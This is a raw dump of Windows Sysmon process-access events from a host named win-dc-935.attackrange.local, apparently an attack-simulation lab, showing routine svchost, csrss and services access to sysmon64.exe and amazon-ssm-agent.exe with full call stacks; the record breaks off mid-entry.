13:53:21.557{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001575Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.556{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001574Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.556{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001573Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.556{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001572Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.556{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001571Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.556{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001570Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.554{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001569Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.554{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001568Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.554{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001567Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.554{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001566Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.554{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001565Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.554{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001564Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.554{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001563Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.553{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001562Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.553{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001561Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.551{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001560Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.551{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001559Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.550{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001558Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.550{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001557Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.550{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001556Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.550{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001555Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.550{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.550{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.550{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.534{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.534{10ACEC4A-853E-5FCF-0A00-000000009101}8521140C:\Windows\system32\services.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program 